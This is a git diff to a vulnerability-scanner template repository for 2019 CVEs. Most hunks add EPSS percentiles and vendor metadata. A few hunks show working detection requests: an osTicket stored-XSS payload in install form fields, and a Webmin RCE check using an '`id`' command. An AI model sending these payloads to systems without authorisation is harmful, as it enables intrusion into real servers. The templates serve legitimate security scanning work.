a/http/cves/2019/CVE-2019-14205.yaml b/http/cves/2019/CVE-2019-14205.yaml index 213178fb2c..e4c70cd572 100644 --- a/http/cves/2019/CVE-2019-14205.yaml +++ b/http/cves/2019/CVE-2019-14205.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-22 epss-score: 0.06333 cpe: cpe:2.3:a:nevma:adaptive_images:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.92717 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2019/CVE-2019-14223.yaml b/http/cves/2019/CVE-2019-14223.yaml index 190145febb..b6d053a15a 100644 --- a/http/cves/2019/CVE-2019-14223.yaml +++ b/http/cves/2019/CVE-2019-14223.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-601 epss-score: 0.00188 cpe: cpe:2.3:a:alfresco:alfresco:*:*:*:*:community:*:*:* + epss-percentile: 0.55496 metadata: max-request: 1 vendor: alfresco diff --git a/http/cves/2019/CVE-2019-14251.yaml b/http/cves/2019/CVE-2019-14251.yaml index c5d9e8b735..7d18a19ed0 100644 --- a/http/cves/2019/CVE-2019-14251.yaml +++ b/http/cves/2019/CVE-2019-14251.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-22 epss-score: 0.01349 cpe: cpe:2.3:a:temenos:t24:r15.01:*:*:*:*:*:*:* + epss-percentile: 0.84467 metadata: max-request: 2 vendor: temenos diff --git a/http/cves/2019/CVE-2019-14312.yaml b/http/cves/2019/CVE-2019-14312.yaml index 4020a1c7a4..16b6a85934 100644 --- a/http/cves/2019/CVE-2019-14312.yaml +++ b/http/cves/2019/CVE-2019-14312.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-22 epss-score: 0.02327 cpe: cpe:2.3:a:aptana:jaxer:1.0.3.4547:*:*:*:*:*:*:* + epss-percentile: 0.88328 metadata: max-request: 1 vendor: aptana diff --git a/http/cves/2019/CVE-2019-14322.yaml b/http/cves/2019/CVE-2019-14322.yaml index 453b69c568..c791fcad4e 100644 --- a/http/cves/2019/CVE-2019-14322.yaml +++ b/http/cves/2019/CVE-2019-14322.yaml @@ -15,8 +15,9 @@ info: cvss-score: 7.5 cve-id: CVE-2019-14322 cwe-id: CWE-22 - epss-score: 0.50941 + epss-score: 0.58463 cpe: cpe:2.3:a:palletsprojects:werkzeug:*:*:*:*:*:*:*:* + epss-percentile: 0.97287 metadata: max-request: 3 vendor: palletsprojects diff --git a/http/cves/2019/CVE-2019-14470.yaml b/http/cves/2019/CVE-2019-14470.yaml index 4c377411e0..2c0176683a 100644 --- a/http/cves/2019/CVE-2019-14470.yaml +++ b/http/cves/2019/CVE-2019-14470.yaml @@ -16,8 +16,9 @@ info: cvss-score: 6.1 cve-id: CVE-2019-14470 cwe-id: CWE-79 - epss-score: 0.82279 + epss-score: 0.78633 cpe: cpe:2.3:a:instagram-php-api_project:instagram-php-api:-:*:*:*:*:*:*:* + epss-percentile: 0.97832 metadata: max-request: 1 vendor: instagram-php-api_project diff --git a/http/cves/2019/CVE-2019-14530.yaml b/http/cves/2019/CVE-2019-14530.yaml index 819c20d58f..a15fba863d 100644 --- a/http/cves/2019/CVE-2019-14530.yaml +++ b/http/cves/2019/CVE-2019-14530.yaml @@ -16,8 +16,9 @@ info: cvss-score: 8.8 cve-id: CVE-2019-14530 cwe-id: CWE-22 - epss-score: 0.86742 + epss-score: 0.83277 cpe: cpe:2.3:a:open-emr:openemr:*:*:*:*:*:*:*:* + epss-percentile: 0.97995 metadata: max-request: 2 verified: true diff --git a/http/cves/2019/CVE-2019-14696.yaml b/http/cves/2019/CVE-2019-14696.yaml index b46cab3224..253602bf97 100644 --- a/http/cves/2019/CVE-2019-14696.yaml +++ b/http/cves/2019/CVE-2019-14696.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00776 cpe: cpe:2.3:a:open-school:open-school:2.3:*:*:*:community:*:*:* + epss-percentile: 0.79096 metadata: max-request: 1 vendor: open-school diff --git a/http/cves/2019/CVE-2019-14750.yaml b/http/cves/2019/CVE-2019-14750.yaml index 29195efb6f..072e34723a 100644 --- a/http/cves/2019/CVE-2019-14750.yaml +++ b/http/cves/2019/CVE-2019-14750.yaml @@ -1,76 +1,84 @@ -id: CVE-2019-14750 - -info: - name: osTicket < 1.12.1 - Cross-Site Scripting - author: TenBird - severity: medium - description: | - An issue was discovered in osTicket before 1.10.7 and 1.12.x before 1.12.1. Stored XSS exists in setup/install.php. It was observed that no input sanitization was provided in the firstname and lastname fields of the application. The insertion of malicious queries in those fields leads to the execution of those queries. This can further lead to cookie stealing or other malicious actions. - reference: - - https://packetstormsecurity.com/files/154005/osTicket-1.12-Cross-Site-Scripting.html - - https://nvd.nist.gov/vuln/detail/CVE-2019-14750 - classification: - cve-id: CVE-2019-14750 - metadata: - max-request: 4 - shodan-query: title:"osTicket" - tags: cve,cve2019,osticket,xss,intrusive - -variables: - user_name: "{{to_lower(rand_text_alphanumeric(6))}}" - user_pass: "{{rand_text_alphanumeric(12)}}" - user_email: "{{username}}@{{to_lower(rand_text_alphanumeric(6))}}.com" - -http: - - raw: - - | - POST /upload/setup/install.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - s=install&name={{user_name}}&email={{user_email}}&lang_id=en_US&fname=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3B%3E&lname=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3B%3E&admin_email={{user_email}}&username={{user_name}}&passwd={{user_pass}}&passwd2={{user_pass}}&prefix=ost_&dbhost={{dbhost}}&dbname=tt&dbuser={{username}}&dbpass={{password}}&timezone=Asia%2FTokyo - - - | - GET /upload/scp/login.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - - | - POST /upload/scp/login.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - __CSRFToken__={{csrftoken}}&do=scplogin&userid={{user_name}}&passwd={{user_pass}}&ajax=1 - - - | - GET /upload/scp/settings.php HTTP/1.1 - Host: {{Hostname}} - - redirects: true - cookie-reuse: true - matchers-condition: and - matchers: - - type: word - part: body_4 - words: - - '' - - 'getConfig().resolve' - condition: and - - - type: word - part: header_4 - words: - - text/html - - - type: status - status: - - 200 - - extractors: - - type: regex - name: csrftoken - part: body - group: 1 - regex: - - '__CSRFToken__" value="(.*?)"' - internal: true +id: CVE-2019-14750 + +info: + name: osTicket < 1.12.1 - Cross-Site Scripting + author: TenBird + severity: medium + description: | + An issue was discovered in osTicket before 1.10.7 and 1.12.x before 1.12.1. Stored XSS exists in setup/install.php. It was observed that no input sanitization was provided in the firstname and lastname fields of the application. The insertion of malicious queries in those fields leads to the execution of those queries. This can further lead to cookie stealing or other malicious actions. + reference: + - https://packetstormsecurity.com/files/154005/osTicket-1.12-Cross-Site-Scripting.html + - https://nvd.nist.gov/vuln/detail/CVE-2019-14750 + - http://packetstormsecurity.com/files/154005/osTicket-1.12-Cross-Site-Scripting.html + - https://github.com/osTicket/osTicket/commit/c3ba5b78261e07a883ad8fac28c214486c854e12 + - https://github.com/osTicket/osTicket/releases/tag/v1.10.7 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2019-14750 + cwe-id: CWE-79 + epss-score: 0.05309 + cpe: cpe:2.3:a:osticket:osticket:*:*:*:*:*:*:*:* + epss-percentile: 0.92085 + metadata: + max-request: 4 + shodan-query: title:"osTicket" + vendor: osticket + product: osticket + tags: packetstorm,cve,cve2019,osticket,xss,intrusive +variables: + user_name: "{{to_lower(rand_text_alphanumeric(6))}}" + user_pass: "{{rand_text_alphanumeric(12)}}" + user_email: "{{username}}@{{to_lower(rand_text_alphanumeric(6))}}.com" + +http: + - raw: + - | + POST /upload/setup/install.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + s=install&name={{user_name}}&email={{user_email}}&lang_id=en_US&fname=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3B%3E&lname=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3B%3E&admin_email={{user_email}}&username={{user_name}}&passwd={{user_pass}}&passwd2={{user_pass}}&prefix=ost_&dbhost={{dbhost}}&dbname=tt&dbuser={{username}}&dbpass={{password}}&timezone=Asia%2FTokyo + - | + GET /upload/scp/login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + - | + POST /upload/scp/login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + __CSRFToken__={{csrftoken}}&do=scplogin&userid={{user_name}}&passwd={{user_pass}}&ajax=1 + - | + GET /upload/scp/settings.php HTTP/1.1 + Host: {{Hostname}} + + redirects: true + cookie-reuse: true + + matchers-condition: and + matchers: + - type: word + part: body_4 + words: + - '' + - 'getConfig().resolve' + condition: and + + - type: word + part: header_4 + words: + - text/html + + - type: status + status: + - 200 + + extractors: + - type: regex + name: csrftoken + part: body + group: 1 + regex: + - '__CSRFToken__" value="(.*?)"' + internal: true diff --git a/http/cves/2019/CVE-2019-14789.yaml b/http/cves/2019/CVE-2019-14789.yaml index a8c43dc3be..554a1c8ee9 100644 --- a/http/cves/2019/CVE-2019-14789.yaml +++ b/http/cves/2019/CVE-2019-14789.yaml @@ -17,12 +17,13 @@ info: cve-id: CVE-2019-14789 cwe-id: CWE-79 epss-score: 0.00125 - cpe: cpe:2.3:a:custom_404_pro_project:custom_404_pro:3.2.8:*:*:*:*:wordpress:*:* + cpe: cpe:2.3:a:kunalnagar:custom_404_pro:3.2.8:*:*:*:*:wordpress:*:* + epss-percentile: 0.46223 metadata: max-request: 2 verified: true framework: wordpress - vendor: custom_404_pro_project + vendor: kunalnagar product: custom_404_pro tags: wpscan,cve,cve2023,custom-404-pro,wp,wp-plugin,wordpress,authenticated,xss diff --git a/http/cves/2019/CVE-2019-14974.yaml b/http/cves/2019/CVE-2019-14974.yaml index 572ce0473e..37f4063207 100644 --- a/http/cves/2019/CVE-2019-14974.yaml +++ b/http/cves/2019/CVE-2019-14974.yaml @@ -15,6 +15,7 @@ info: cwe-id: CWE-79 epss-score: 0.00217 cpe: cpe:2.3:a:sugarcrm:sugarcrm:9.0.0:*:*:*:enterprise:*:*:* + epss-percentile: 0.59028 metadata: max-request: 1 vendor: sugarcrm diff --git a/http/cves/2019/CVE-2019-15043.yaml b/http/cves/2019/CVE-2019-15043.yaml index d1fa4e3a85..0744c79dfa 100644 --- a/http/cves/2019/CVE-2019-15043.yaml +++ b/http/cves/2019/CVE-2019-15043.yaml @@ -19,8 +19,9 @@ info: cvss-score: 7.5 cve-id: CVE-2019-15043 cwe-id: CWE-306 - epss-score: 0.16944 + epss-score: 0.27328 cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:* + epss-percentile: 0.96168 metadata: max-request: 1 shodan-query: title:"Grafana" diff --git a/http/cves/2019/CVE-2019-15107.yaml b/http/cves/2019/CVE-2019-15107.yaml index 03654a4898..83e0120ad3 100644 --- a/http/cves/2019/CVE-2019-15107.yaml +++ b/http/cves/2019/CVE-2019-15107.yaml @@ -16,8 +16,9 @@ info: cvss-score: 9.8 cve-id: CVE-2019-15107 cwe-id: CWE-78 - epss-score: 0.97514 + epss-score: 0.97528 cpe: cpe:2.3:a:webmin:webmin:*:*:*:*:*:*:*:* + epss-percentile: 0.99981 metadata: max-request: 1 vendor: webmin diff --git a/http/cves/2019/CVE-2019-15501.yaml b/http/cves/2019/CVE-2019-15501.yaml index bb39d34585..46802682b8 100644 --- a/http/cves/2019/CVE-2019-15501.yaml +++ b/http/cves/2019/CVE-2019-15501.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00303 cpe: cpe:2.3:a:lsoft:listserv:*:*:*:*:*:*:*:* + epss-percentile: 0.65819 metadata: max-request: 1 shodan-query: http.html:"LISTSERV" diff --git a/http/cves/2019/CVE-2019-15642.yaml b/http/cves/2019/CVE-2019-15642.yaml index e0aa449417..6b0e93bcd5 100644 --- a/http/cves/2019/CVE-2019-15642.yaml +++ b/http/cves/2019/CVE-2019-15642.yaml @@ -9,12 +9,24 @@ info: reference: - https://nvd.nist.gov/vuln/detail/CVE-2019-15642 - https://github.com/jas502n/CVE-2019-15642 + - https://doxfer.webmin.com/Webmin/Webmin_Servers_Index + - https://github.com/webmin/webmin/blob/ab5e00e41ea1ecc1e24b8f8693f3495a0abb1aed/rpc.cgi#L26-L37 + - https://github.com/webmin/webmin/commit/df8a43fb4bdc9c858874f72773bcba597ae9432c + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2019-15642 + cwe-id: CWE-94 + epss-score: 0.26994 + cpe: cpe:2.3:a:webmin:webmin:*:*:*:*:*:*:*:* + epss-percentile: 0.96156 metadata: max-request: 4 shodan-query: title:"Webmin" verified: true + vendor: webmin + product: webmin tags: cve,cve2019,webmin,rce - variables: cmd: '`id`' @@ -30,7 +42,6 @@ http: Accept-Encoding: gzip, deflate user={{username}}&pass={{password}} - - | POST /rpc.cgi HTTP/1.1 Host: {{Hostname}} @@ -48,10 +59,10 @@ http: password: - admin - root - stop-at-first-match: true host-redirects: true cookie-reuse: true + matchers-condition: and matchers: - type: regex diff --git a/http/cves/2019/CVE-2019-15713.yaml b/http/cves/2019/CVE-2019-15713.yaml index 718229e325..8f53324c59 100644 --- a/http/cves/2019/CVE-2019-15713.yaml +++ b/http/cves/2019/CVE-2019-15713.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.00101 cpe: cpe:2.3:a:my_calendar_project:my_calendar:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.40822 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2019/CVE-2019-15811.yaml b/http/cves/2019/CVE-2019-15811.yaml index f978a0c04f..41509b3dec 100644 --- a/http/cves/2019/CVE-2019-15811.yaml +++ b/http/cves/2019/CVE-2019-15811.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-79 epss-score: 0.00376 cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* + epss-percentile: 0.6932 metadata: max-request: 2 verified: true diff --git a/http/cves/2019/CVE-2019-15858.yaml b/http/cves/2019/CVE-2019-15858.yaml index 8e2c060ef2..d24e339184 100644 --- a/http/cves/2019/CVE-2019-15858.yaml +++ b/http/cves/2019/CVE-2019-15858.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-306 epss-score: 0.02782 cpe: cpe:2.3:a:webcraftic:woody_ad_snippets:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.8928 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2019/CVE-2019-15859.yaml b/http/cves/2019/CVE-2019-15859.yaml index f282beb1c4..5f5466dfce 100644 --- a/http/cves/2019/CVE-2019-15859.yaml +++ b/http/cves/2019/CVE-2019-15859.yaml @@ -16,8 +16,9 @@ info: cvss-score: 9.8 cve-id: CVE-2019-15859 cwe-id: CWE-200 - epss-score: 0.08759 + epss-score: 0.12379 cpe: cpe:2.3:o:socomec:diris_a-40_firmware:*:*:*:*:*:*:*:* + epss-percentile: 0.94685 metadata: max-request: 1 vendor: socomec diff --git a/http/cves/2019/CVE-2019-15889.yaml b/http/cves/2019/CVE-2019-15889.yaml index d607f21e10..3d435e85b9 100644 --- a/http/cves/2019/CVE-2019-15889.yaml +++ b/http/cves/2019/CVE-2019-15889.yaml @@ -16,8 +16,9 @@ info: cvss-score: 6.1 cve-id: CVE-2019-15889 cwe-id: CWE-79 - epss-score: 0.04127 + epss-score: 0.0427 cpe: cpe:2.3:a:wpdownloadmanager:wordpress_download_manager:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.91187 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2019/CVE-2019-16057.yaml b/http/cves/2019/CVE-2019-16057.yaml index 5f4cceb6f5..1a8d9db84f 100644 --- a/http/cves/2019/CVE-2019-16057.yaml +++ b/http/cves/2019/CVE-2019-16057.yaml @@ -15,10 +15,15 @@ info: cvss-score: 9.8 cve-id: CVE-2019-16057 cwe-id: CWE-78 + epss-score: 0.97548 + cpe: cpe:2.3:o:dlink:dns-320_firmware:*:*:*:*:*:*:*:* + epss-percentile: 0.99991 metadata: max-request: 1 verified: true shodan-query: html:"ShareCenter" + vendor: dlink + product: dns-320_firmware tags: cve,cve2019,lfi,rce,kev,sharecenter,dlink http: diff --git a/http/cves/2019/CVE-2019-16097.yaml b/http/cves/2019/CVE-2019-16097.yaml index 613cbba062..918c889739 100644 --- a/http/cves/2019/CVE-2019-16097.yaml +++ b/http/cves/2019/CVE-2019-16097.yaml @@ -17,8 +17,9 @@ info: cvss-score: 6.5 cve-id: CVE-2019-16097 cwe-id: CWE-862 - epss-score: 0.96766 + epss-score: 0.96909 cpe: cpe:2.3:a:linuxfoundation:harbor:1.7.0:-:*:*:*:*:*:* + epss-percentile: 0.99592 metadata: max-request: 1 vendor: linuxfoundation diff --git a/http/cves/2019/CVE-2019-16123.yaml b/http/cves/2019/CVE-2019-16123.yaml index 5bf5681821..03f426669a 100644 --- a/http/cves/2019/CVE-2019-16123.yaml +++ b/http/cves/2019/CVE-2019-16123.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-22 epss-score: 0.72953 cpe: cpe:2.3:a:kartatopia:piluscart:*:*:*:*:*:*:*:* + epss-percentile: 0.97666 metadata: max-request: 1 vendor: kartatopia diff --git a/http/cves/2019/CVE-2019-16278.yaml b/http/cves/2019/CVE-2019-16278.yaml index 9c5219eaa8..db3200eb5d 100644 --- a/http/cves/2019/CVE-2019-16278.yaml +++ b/http/cves/2019/CVE-2019-16278.yaml @@ -16,8 +16,9 @@ info: cvss-score: 9.8 cve-id: CVE-2019-16278 cwe-id: CWE-22 - epss-score: 0.97376 + epss-score: 0.97349 cpe: cpe:2.3:a:nazgul:nostromo_nhttpd:*:*:*:*:*:*:*:* + epss-percentile: 0.99835 metadata: max-request: 1 vendor: nazgul diff --git a/http/cves/2019/CVE-2019-16313.yaml b/http/cves/2019/CVE-2019-16313.yaml index b749d5a6e5..07a4dc519f 100644 --- a/http/cves/2019/CVE-2019-16313.yaml +++ b/http/cves/2019/CVE-2019-16313.yaml @@ -14,8 +14,9 @@ info: cvss-score: 7.5 cve-id: CVE-2019-16313 cwe-id: CWE-798 - epss-score: 0.02088 + epss-score: 0.02626 cpe: cpe:2.3:o:ifw8:fr6_firmware:4.31:*:*:*:*:*:*:* + epss-percentile: 0.88983 metadata: max-request: 1 vendor: ifw8 diff --git a/http/cves/2019/CVE-2019-16332.yaml b/http/cves/2019/CVE-2019-16332.yaml index 4d1f93f688..f23c1f73d7 100644 --- a/http/cves/2019/CVE-2019-16332.yaml +++ b/http/cves/2019/CVE-2019-16332.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-79 epss-score: 0.00303 cpe: cpe:2.3:a:api_bearer_auth_project:api_bearer_auth:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.65787 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2019/CVE-2019-16525.yaml b/http/cves/2019/CVE-2019-16525.yaml index f2ed79fc67..f775af5a28 100644 --- a/http/cves/2019/CVE-2019-16525.yaml +++ b/http/cves/2019/CVE-2019-16525.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-79 epss-score: 0.00323 cpe: cpe:2.3:a:checklist:checklist:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.66929 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2019/CVE-2019-1653.yaml b/http/cves/2019/CVE-2019-1653.yaml index e07d6e2a4e..033cfb87dd 100644 --- a/http/cves/2019/CVE-2019-1653.yaml +++ b/http/cves/2019/CVE-2019-1653.yaml @@ -21,6 +21,7 @@ info: cwe-id: CWE-200,CWE-284 epss-score: 0.97578 cpe: cpe:2.3:o:cisco:rv320_firmware:1.4.2.15:*:*:*:*:*:*:* + epss-percentile: 1 metadata: max-request: 1 vendor: cisco diff --git a/http/cves/2019/CVE-2019-16662.yaml b/http/cves/2019/CVE-2019-16662.yaml index 7b2b981f1b..14e844f025 100644 --- a/http/cves/2019/CVE-2019-16662.yaml +++ b/http/cves/2019/CVE-2019-16662.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-78 epss-score: 0.97573 cpe: cpe:2.3:a:rconfig:rconfig:3.9.2:*:*:*:*:*:*:* + epss-percentile: 0.99999 metadata: max-request: 1 vendor: rconfig diff --git a/http/cves/2019/CVE-2019-16759.yaml b/http/cves/2019/CVE-2019-16759.yaml index 6359e923b0..f04ae0d7e4 100644 --- a/http/cves/2019/CVE-2019-16759.yaml +++ b/http/cves/2019/CVE-2019-16759.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-94 epss-score: 0.97535 cpe: cpe:2.3:a:vbulletin:vbulletin:*:*:*:*:*:*:*:* + epss-percentile: 0.99987 metadata: max-request: 1 shodan-query: http.component:"vBulletin" diff --git a/http/cves/2019/CVE-2019-16920.yaml b/http/cves/2019/CVE-2019-16920.yaml index e048cf18e2..3d09e06043 100644 --- a/http/cves/2019/CVE-2019-16920.yaml +++ b/http/cves/2019/CVE-2019-16920.yaml @@ -16,8 +16,9 @@ info: cvss-score: 9.8 cve-id: CVE-2019-16920 cwe-id: CWE-78 - epss-score: 0.96236 + epss-score: 0.96275 cpe: cpe:2.3:o:dlink:dir-655_firmware:*:*:*:*:*:*:*:* + epss-percentile: 0.99325 metadata: max-request: 3 vendor: dlink diff --git a/http/cves/2019/CVE-2019-16931.yaml b/http/cves/2019/CVE-2019-16931.yaml index f03534446c..6feffb993f 100644 --- a/http/cves/2019/CVE-2019-16931.yaml +++ b/http/cves/2019/CVE-2019-16931.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-79 epss-score: 0.00244 cpe: cpe:2.3:a:themeisle:visualizer:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.61655 metadata: max-request: 1 verified: true diff --git a/http/cves/2019/CVE-2019-16932.yaml b/http/cves/2019/CVE-2019-16932.yaml index 503ca729ea..8469e34c22 100644 --- a/http/cves/2019/CVE-2019-16932.yaml +++ b/http/cves/2019/CVE-2019-16932.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-918 epss-score: 0.53434 cpe: cpe:2.3:a:themeisle:visualizer:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.97161 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2019/CVE-2019-16996.yaml b/http/cves/2019/CVE-2019-16996.yaml index 4f67d94790..cbc2a831a2 100644 --- a/http/cves/2019/CVE-2019-16996.yaml +++ b/http/cves/2019/CVE-2019-16996.yaml @@ -15,6 +15,7 @@ info: cwe-id: CWE-89 epss-score: 0.30632 cpe: cpe:2.3:a:metinfo:metinfo:7.0.0:beta:*:*:*:*:*:* + epss-percentile: 0.96378 metadata: max-request: 1 vendor: metinfo diff --git a/http/cves/2019/CVE-2019-16997.yaml b/http/cves/2019/CVE-2019-16997.yaml index 94c5cf4036..433c153d3b 100644 --- a/http/cves/2019/CVE-2019-16997.yaml +++ b/http/cves/2019/CVE-2019-16997.yaml @@ -15,6 +15,7 @@ info: cwe-id: CWE-89 epss-score: 0.30632 cpe: cpe:2.3:a:metinfo:metinfo:7.0.0:beta:*:*:*:*:*:* + epss-percentile: 0.96378 metadata: max-request: 1 vendor: metinfo diff --git a/http/cves/2019/CVE-2019-17270.yaml b/http/cves/2019/CVE-2019-17270.yaml index 56a98483d6..0c7190dadc 100644 --- a/http/cves/2019/CVE-2019-17270.yaml +++ b/http/cves/2019/CVE-2019-17270.yaml @@ -15,8 +15,9 @@ info: cvss-score: 9.8 cve-id: CVE-2019-17270 cwe-id: CWE-78 - epss-score: 0.94991 + epss-score: 0.94092 cpe: cpe:2.3:a:yachtcontrol:yachtcontrol:*:*:*:*:*:*:*:* + epss-percentile: 0.98826 metadata: max-request: 1 vendor: yachtcontrol diff --git a/http/cves/2019/CVE-2019-17382.yaml b/http/cves/2019/CVE-2019-17382.yaml index 5e91afd3e5..a14fed3bd1 100644 --- a/http/cves/2019/CVE-2019-17382.yaml +++ b/http/cves/2019/CVE-2019-17382.yaml @@ -8,13 +8,15 @@ info: reference: - https://www.exploit-db.com/exploits/47467 - https://nvd.nist.gov/vuln/detail/CVE-2019-17382 + - https://lists.debian.org/debian-lts-announce/2023/08/msg00027.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N cvss-score: 9.1 cve-id: CVE-2019-17382 cwe-id: CWE-639 - epss-score: 0.16332 + epss-score: 0.25064 cpe: cpe:2.3:a:zabbix:zabbix:*:*:*:*:*:*:*:* + epss-percentile: 0.9605 metadata: max-request: 100 vendor: zabbix diff --git a/http/cves/2019/CVE-2019-17418.yaml b/http/cves/2019/CVE-2019-17418.yaml index f7ee14842b..e205ffca3f 100644 --- a/http/cves/2019/CVE-2019-17418.yaml +++ b/http/cves/2019/CVE-2019-17418.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-89 epss-score: 0.43984 cpe: cpe:2.3:a:metinfo:metinfo:7.0.0:beta:*:*:*:*:*:* + epss-percentile: 0.96882 metadata: max-request: 1 vendor: metinfo diff --git a/http/cves/2019/CVE-2019-17444.yaml b/http/cves/2019/CVE-2019-17444.yaml index 069dcd0c9a..0f21492478 100644 --- a/http/cves/2019/CVE-2019-17444.yaml +++ b/http/cves/2019/CVE-2019-17444.yaml @@ -15,8 +15,9 @@ info: cvss-score: 9.8 cve-id: CVE-2019-17444 cwe-id: CWE-521 - epss-score: 0.06223 + epss-score: 0.07015 cpe: cpe:2.3:a:jfrog:artifactory:*:*:*:*:*:-:*:* + epss-percentile: 0.9309 metadata: max-request: 1 framework: "-" diff --git a/http/cves/2019/CVE-2019-17503.yaml b/http/cves/2019/CVE-2019-17503.yaml index 85729c29ef..9b406d4397 100644 --- a/http/cves/2019/CVE-2019-17503.yaml +++ b/http/cves/2019/CVE-2019-17503.yaml @@ -15,8 +15,9 @@ info: cvss-score: 5.3 cve-id: CVE-2019-17503 cwe-id: CWE-425 - epss-score: 0.00339 + epss-score: 0.00433 cpe: cpe:2.3:a:kirona:dynamic_resource_scheduling:5.5.3.5:*:*:*:*:*:*:* + epss-percentile: 0.71395 metadata: max-request: 2 vendor: kirona diff --git a/http/cves/2019/CVE-2019-17506.yaml b/http/cves/2019/CVE-2019-17506.yaml index 1f91961bac..f151a8daf0 100644 --- a/http/cves/2019/CVE-2019-17506.yaml +++ b/http/cves/2019/CVE-2019-17506.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-306 epss-score: 0.90125 cpe: cpe:2.3:o:dlink:dir-868l_b1_firmware:2.03:*:*:*:*:*:*:* + epss-percentile: 0.98375 metadata: max-request: 1 vendor: dlink diff --git a/http/cves/2019/CVE-2019-17538.yaml b/http/cves/2019/CVE-2019-17538.yaml index 0d09d40625..26b8cd34e6 100644 --- a/http/cves/2019/CVE-2019-17538.yaml +++ b/http/cves/2019/CVE-2019-17538.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-22 epss-score: 0.00838 cpe: cpe:2.3:a:jnoj:jiangnan_online_judge:0.8.0:*:*:*:*:*:*:* + epss-percentile: 0.79928 metadata: max-request: 1 vendor: jnoj diff --git a/http/cves/2019/CVE-2019-17558.yaml b/http/cves/2019/CVE-2019-17558.yaml index 7201400b6b..90017eb190 100644 --- a/http/cves/2019/CVE-2019-17558.yaml +++ b/http/cves/2019/CVE-2019-17558.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-74 epss-score: 0.97543 cpe: cpe:2.3:a:apache:solr:*:*:*:*:*:*:*:* + epss-percentile: 0.99991 metadata: max-request: 3 vendor: apache diff --git a/http/cves/2019/CVE-2019-17574.yaml b/http/cves/2019/CVE-2019-17574.yaml index 9c0e434b36..aa36e4b524 100644 --- a/http/cves/2019/CVE-2019-17574.yaml +++ b/http/cves/2019/CVE-2019-17574.yaml @@ -17,8 +17,9 @@ info: cvss-score: 9.1 cve-id: 'CVE-2019-17574' cwe-id: CWE-639 - epss-score: 0.15779 + epss-score: 0.14192 cpe: cpe:2.3:a:code-atlantic:popup_maker:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.94987 metadata: max-request: 2 verified: true diff --git a/http/cves/2019/CVE-2019-17662.yaml b/http/cves/2019/CVE-2019-17662.yaml index 7bc0b472df..f4ef2abd0a 100644 --- a/http/cves/2019/CVE-2019-17662.yaml +++ b/http/cves/2019/CVE-2019-17662.yaml @@ -10,15 +10,22 @@ info: - http://packetstormsecurity.com/files/154896/ThinVNC-1.0b1-Authentication-Bypass.html - https://github.com/bewest/thinvnc/issues/5 - https://redteamzone.com/ThinVNC/ + - https://github.com/shashankmangal2/Exploits/blob/master/ThinVNC-RemoteAccess/POC.py classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 - cwe-id: CWE-522,CWE-22 + cve-id: CVE-2019-17662 + cwe-id: CWE-22 + epss-score: 0.50347 + cpe: cpe:2.3:a:cybelsoft:thinvnc:1.0:b1:*:*:*:*:*:* + epss-percentile: 0.9709 metadata: max-request: 1 shodan-query: http.favicon.hash:-1414548363 verified: true - tags: cve,cve2019,auth-bypass,thinvnc + vendor: cybelsoft + product: thinvnc + tags: packetstorm,cve,cve2019,auth-bypass,thinvnc,intrusive http: - raw: diff --git a/http/cves/2019/CVE-2019-1821.yaml b/http/cves/2019/CVE-2019-1821.yaml index 9a9f536010..972dc249ef 100644 